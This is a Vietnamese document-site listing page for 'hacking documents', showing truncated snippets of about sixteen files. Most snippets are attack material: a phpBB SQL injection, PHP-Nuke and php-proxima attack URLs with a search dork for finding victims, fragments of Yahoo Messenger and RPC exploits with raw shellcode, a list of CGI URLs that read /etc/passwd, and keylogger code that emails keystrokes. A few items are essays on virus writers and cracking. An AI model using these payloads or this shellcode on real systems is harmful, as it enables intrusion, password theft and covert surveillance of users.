« Home « Chủ đề tài liệu về hack

Chủ đề : tài liệu về hack


Có 77+ tài liệu thuộc chủ đề "tài liệu về hack"

Phpbb 2.0.5 Sql Injection Password

tailieu.vn

The variable is $topic_id. this is checking done for $topic_id in viewtopic.php:. $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);. $topic_id = intval($HTTP_GET_VARS['topic']);. AND u.user_id = s.session_user_id. AND p.topic_id = $topic_id. AND p.post_time >= u.user_lastvisit. $topic_id gets passed directy to query. AND p.post_time >= ...". "?sid=1&topic_id=­1". HTTP/1.0\n\n";

PhpNuke Path Disclosure

tailieu.vn

PhpNuke ­ Path Disclosure. Lỗi Path Disclosure ở PHP­Nuke 6.x, và những version khác? . +http://victim.x/modules.php?. op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words] . +http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink Nếu [any_words] có một giá trị không thuộc số hay là một giá trị NULL, thì nó sẽ đưa ra "path disclosure"

Lỗi của phpproxima, Remote File Access

tailieu.vn

Homepage : http://www.php­proxima.com/ . Một trong những cái thay đổi đó là php­proxima có chứa một file gọi là autohtml.php. include("mainfile.php". include("header.php". Một user có thể tránh include mainfile.php và chèn bất kỳ cái gì vào $name. +http://victim/autohtml.php?op=modload&mainfile=x&name=<local filename>. Có thể vào google tìm cũng có nhiều cho các bạn test:allinurl: /autohtml.php?op=

Remote Yahoo Messenger V5.5 Exploiter

tailieu.vn

#include <windows.h>. #include <stdio.h>. #include <stdlib.h>. #include <string.h>. #include <stdio.h>. #include <winsock2.h>. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". fprintf(stdout,"Creating index.html: ");. if ((fptr =fopen("index.html","w"))==NULL){. here whe make the index.html. %c>....</html>. closing index.html again. server.sin_family = AF_INET;. server.sin_port = htons(port);. server.sin_addr.s_addr = INADDR_ANY. memset(server.sin_zero,0,8. if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){. inet_ntoa(client.sin_addr),he­>h_name);. if ((fptr =fopen("index.html","r"))==NULL){

Rpc Remote Returnintolibc Exploit

tailieu.vn

\x90\x90 before the shellcode replaced with \xcd\x21. "\x90\x90\x90\x90". "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". "\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e". "\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9". "\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68". "\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04". "\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff". "\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76". "\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76". "\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76". "\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76". "\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76". "\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76". "\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff". "\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50". "\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56". "\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63". "\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b". "\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56". "\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c". "\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24". "\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";. rets.type=0x3000;. rets.prot=0x4;. rets.newprot=0x20;. rets.valloc=targets[id].valloc;. rets.amemcpy=targets[id].amemcpy;. rets.vprot=targets[id].vprot;. fr1.ret=rets.ret1=rets.ret2=targets[id].ret;. fr1.frame0=targets[id].frame;. rets.frame1=fr1.frame0+9*4;. rets.frame2=rets.frame1+6*4;. rets.oldprot=fr1.frame0;. rets.frame3=rets.frame1;. rets.size2=sizeof(shell);. rets.src=fr1.frame0;. rets.dest=0x55555000;. rets.ret3=0x5555506c;. rets.dummy1=rets.dummy2=0xffffffff;. rets.zero=0;. rets.pointer11=fr1.frame0+92;. rets.pointer12=fr1.frame0+96;. rets.pointer21=fr1.frame0+100;. rets.pointer22=fr1.frame0+104;. Connection lost..\n");. printf("%d\t%s\n",i,targets[i].description). printf("Exploiting %s...\n",argv[1]);. sin.sin_port=htons(135);. sin.sin_port = ...

Săn tên miền – thú tiêu khiển mới của hacker!

tailieu.vn

domain name (tên miền). Những site trên đều đăng ký domain name tại Enom, nhà cung cấp domain name nổi tiếng trên thế giới. săn domain name.. Những kẻ săn domain name. Cộng đồng Internet VN rơi vào tình trạng vô cùng hỗn loạn bởi vì domain name của các website cứ đội nón ra đi, đến nỗi unknown, biệt ...

Show & Kill Processes

tailieu.vn

(ByVal hwnd As Long, ByVal wCmd As Long) As Long Private Declare Function GetParent Lib "user32". (ByVal hwnd As Long) As Long. (ByVal hwnd As Long) As Long Private Declare Function GetWindowText Lib "user32". (ByVal hwnd As Long, ByVal _ lpString As String, ByVal cch As Long) As Long. (ByVal lpClassName As String, ByVal lpWindowName As String) As Long. ByVal ...

Site hack đầu tay

tailieu.vn

Có nhiều bạn thắc mắc Hack trang Web là gì ? và phải Hack làm sao. Hack một Website có rất nhiều cách mà đa số là Hacker dựa vào các lỗ hổng bảo mật như : IIS, Hosting Controller, Buffer Overflow. Có rất nhiều bài dạy về Hack Web nhưng đây là bài căn bản và dễ hiểu nhất, ...

Some old Bug on Server

tailieu.vn

campas.cgi http://IP//cgi-bin/campas?%0acat%0a/etc/passwd%0a faxsurvey.cgi http://IP/cgi-bin/faxsurvery?/bin/cat%20/etc/passwd IIS4 http://IP/scripts/iisadmin/ism.dll?http/dir. MetaIP 2 http://www.victim.com winnt/system32/net.exe?use%20 nph-test.cgi http://IP/cgi-bin/nph-test.cgi?*. nph-test.cgi http://IP/cgi-bin/nph-test.cgi?/*. phf.cgi http://IP/cgi-bin/phf?Qalias=x%0a/bin/cat/%20/etc/passwd php.cgi http://IP/cgi-bin/php.cgi?/etc/passwd. test-cgi http://IP/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd test-cgi 2 GET /cgi-bin/test-cgi?/*. webdist.cgi http://IP/webdist.cgi?distloc=;/bin/cat%20/etc/passwd

Sql Inject nâng cao

tailieu.vn

 Các bạn thử xem một câu truy vấn SQL:. thì 'id','forename' và 'surname' là column của table author,khi câu truy vấn trên làm việc thì nó sẽ cho kết quả tất cã các dòng trong table author.Xem câu truy vấn sau:. Đây là câu truy vấn có điều kiện chắc không nói các bạn cũng biết,nó cho ra kết quả ...

SQL Injection

tailieu.vn

Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Bạn có thể search các trang web cho phép submit data ở bất kì một search­engine nào trên mạng, chẳng hạn như ...

Chương Trình Supperkeylogger

tailieu.vn

Form chính có tên là Form1.frm:. Form1.send.Text . Form1.send.Text = Form1.send.Text &. Form1.SendEMail (path) Kill path. &H1) Then Form1.Text1 = Form1.Text1 + "A". &H1) Then Form1.Text1 = Form1.Text1 + "a". &H1) Then Form1.Text1 = Form1.Text1 + "B". &H1) Then Form1.Text1 = Form1.Text1 + "b". &H1) Then Form1.Text1 = Form1.Text1 + "C". &H1) Then Form1.Text1 = Form1.Text1 + "c". &H1) Then...

Tại sao người ta viết virus máy tính ? Niềm đam mê Hay bệnh nghề nghiệp

tailieu.vn

Tại sao người ta viết virus máy tính ? Niềm đam mê Hay bệnh nghề nghiệp.  Hàng triệu máy tính và mạng đã bị hạ gục bởi đủ loại virus khác nhau trong những năm qua. Theo Sarah Gordon, chuyên gia nổi tiếng về worm máy tính và an ninh hệ thống, tác giả virus thuộc mọi lứa tuổi, mức ...

Crack ! còn ngày mai của công nghiệp phần mềm Việt Nam ?

tailieu.vn

Crack ! còn ngày mai của công nghiệp phần mềm Việt Nam ? trang này đã được đọc lần . Với một số bạn trẻ, khóa bảo vệ các sản phẩm phần mềm là sự thách thức khả năng của họ, việc bẻ các khóa này vừa như một phương thức tìm tòi cơ hội rèn luyện tri thức, kỹ ...

Những hiểu biết cơ bản nhất để trở thành Hacker

tailieu.vn

Có thể nhiều bạn không đồng ý với tôi nhưng cách tốt nhất để thực tập. là các bạn hãy dùng HĐH Window 9X , rồI đến các cái khác mạnh hơn đó là Linux hoặc Unix , dướI đây là những cái bạn cần có. Một cái OS ( có thể là DOS , Window 9X , Linux , ...

Những hiểu biết cơ bản nhất để trở thành Hacker - phần 2

tailieu.vn

Tấn công DDoS thông qua Trinoo. chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ­­­­­>. dos ...

Những hiểu biết cơ bản nhất để trở thành Hacker - phần 4

tailieu.vn

Trước hết , các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó : CODE . ".txt";. tên tuỳ các bạn >.php. Đối với các bạn đã từng làm Web chắc sẽ rất dễ phảI không. ip của nạn nhân >.txt . Bạn có thể tìm những trang web để thực hành thử cách trong VD này ...